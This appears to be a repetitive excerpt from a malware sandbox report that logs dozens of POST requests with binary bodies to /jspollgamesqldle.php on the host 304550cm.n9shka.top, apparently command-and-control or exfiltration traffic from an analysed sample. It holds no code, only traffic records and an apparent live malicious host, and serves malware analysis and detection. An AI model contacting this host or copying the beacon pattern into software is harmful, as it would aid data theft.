                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 1400Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 1412Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2528Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 1412Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2528Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 1372Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 1400Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2528Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 1400Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2528Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 1400Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 1412Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 1412Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2528Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2528Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 1412Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 1412Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
